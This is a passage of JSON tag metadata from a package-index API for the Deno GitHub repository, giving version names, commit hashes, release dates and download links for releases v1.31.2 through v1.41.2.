cosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d